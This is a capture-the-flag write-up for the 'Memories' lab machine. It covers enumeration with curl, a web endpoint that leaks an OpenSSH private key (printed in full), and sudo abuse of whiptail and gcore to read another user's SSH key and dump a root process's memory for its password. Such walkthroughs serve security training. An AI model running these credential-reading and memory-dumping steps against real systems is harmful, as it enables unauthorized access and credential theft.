HMV Memories Summary

2026-04-17 2026-04-17221 Words

This is a Linux machine which leaks laura's openssh private key with its web service, then I leverage some LOTL techniques to get password of root user.

Scope

Name: Memories
Difficulty: (2/10)
OS: Linux
IP: memories.hmv (192.168.56.137)

Enumeration

The scanning result of nmap reveal that only SSH and Web services there. Then I first try some common endpoints for that web.

❯ curl 'http://memories.hmv/robots.txt'
/memories

It hints me there's a /memories endpoint. I discover it's a login form which requires some credentials for that. But what interesting thing is it leaks out a openssh private key when I request it with POST type.

❯ curl 'http://memories.hmv/memories' -X POST -L
laura
<!--
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA2W+WidI/grDh9S7BHggHhYFtusWhcArliwIzfEUbjxI+YSMxaCpR
PmPQHVy9dMWW0Joml9ShJiH8m2STT4vH36vyWpgBmZRAgm3lnfc/CzOzI+onbJ8IkfQiG0
RAnGowyax9qB1JYz07lYqlEsnYA39M98yLNtYZnO7cbAFp6vOz82LCQFm3JoOENmkQQlzG
kx0tI9sDtDHgAughL+Gig23nEFcJVYZlms1vwFbTBV3QafbxSmstIdgr4CfODM/tKjTPMD
dTqFEf5CEi+3cFiNBRr4FVfsb2otaOwzZ5mSgzsZ/WvuGZ1lnrrSb61J5aH6/3w/3/5TEK
BCtMDc5fSwAAA8he+yvgXvsr4AAAAAdzc2gtcnNhAAABAQDZb5aJ0j+CsOH1LsEeCAeFgW
26xaFwCuWLAjN8RRuPEj5hIzFoKlE+Y9AdXL10xZbQmiaX1KEmIfybZJNPi8ffq/JamAGZ
lECCbeWd9z8LM7Mj6idsnwiR9CIbRECcajDJrH2oHUljPTuViqUSydgDf0z3zIs21hmc7t
xsAWnq87PzYsJAWbcmg4Q2aRBCXMaTHS0j2wO0MeAC6CEv4aKDbecQVwlVhmWazW/AVtMF
XdBp9vFKay0h2CvgJ84Mz+0qNM8wN1OoUR/kISL7dwWI0FGvgVV+xvai1o7DNnmZKDOxn9
a+4ZnWWeutJvrUnlofr/fD/f/lMQoEK0wNzl9LAAAAAwEAAQAAAQAMm4PHCgHUuhzf8o4Q
B7cn7pFGOx9ZN8iHfuEtW3R1n0EusLO0rn93dqIikbYKh0pvXgDO3O1bIK1c9T/1ZM16Eq
ZCyn2NQiNbbLPbrPJi2+SPOIyAp9f/XoB7xEFa0G1zxCSlEs2mi25hBWD87ecwjLkRxTJt
Q4zIpLDzMkHJ9awYwCkweO2Oq3ia4L01nSXEAnhNfC074LT/mvvmOWebB37i0WHXn2iLMO
ab2yF4GWZcsVaU3DC08ZQHEOn/98xEV/22SLhlqxzK/XPk2XK/e2Egdg3qM3s9QDvzv1Qj
WSp+MVnbezr+e6qPwLmDHAtLY34U6fMDndcautebRNDBAAAAgEtUAUhMxTiu2c0wASGDrC
+/kcLSJhUg8p96546I20cMsmJiYZUH/hFITe4mzhehrYx74XJu9UePpvf7nePAFcHpKZki
Uf2p86G1/zQf4ti0a5h6Udbyon9d7Z6gq38loJoeYbyqCoBAO93ZgdxzbGZd0sLiSEeSNa
98kUV8oYPCAAAAgQD6dbOG9CnC8Y4Bl2J8/1JFWLh9YoZfQd5G+NsJrGiMlQjBgtPemsdQ
11Z0l6VSQhPMtQFbvHhpYwzFDNQbfRbkZgenQ8JDL5lEkZ7T8bkhtakZwMOIM9ewyN92eU
MiIFaBPKZ9PXxSYcnQcW2iGa8xwlIO0wg4kNDPARSmrBOZ1wAAAIEA3j7hORliNXJUafDa
6iSzgbBoKy1bdyvc+GlyLYdtYAHblglzwy8TJUu4nIXQZzb4MrlKhG32s4AfaXoRVc2Uo7
RCk0pW+N3Nyao0xod+3DeGCD8ZiEpNON4K9HM6fY6PA1ecpbXepR3h9LzZmSVFfyxngw2F
rrO2R16UEDh4v60AAAAObGF1cmFAbWVtb3JpZXMBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
-->

So I just obtain the initial foothold of the system.

Privilege Escalation

I immediately discover following useful LOTL tool that could be exploited after login into by that private key.

laura@memories:~$ sudo -l
Matching Defaults entries for laura on memories:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User laura may run the following commands on memories:
    (lucy) NOPASSWD: /usr/bin/whiptail

And user lucy has own the ssh config directory there. So i decide to leverage whiptail to read out her ssh private key!

With the information within GTFOBins, I get what correct option for that tool.

whiptail --textbox --scrolltext /path/to/file 0 0

After that I discover lucy also has similar sudo rule.

lucy@memories:~$ sudo -l
Matching Defaults entries for lucy on memories:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on memories:
    (ALL : ALL) NOPASSWD: /usr/bin/gcore

And from the result of the pspy which is to monitor linux processes I get that root user could run /root/memories every minutes. So I use following command to make a coredump of that process.

while :; do ps -ef | grep memories | grep -v grep | xargs sudo /usr/bin/gcore ; done

Then I discover the password of the root user by strings.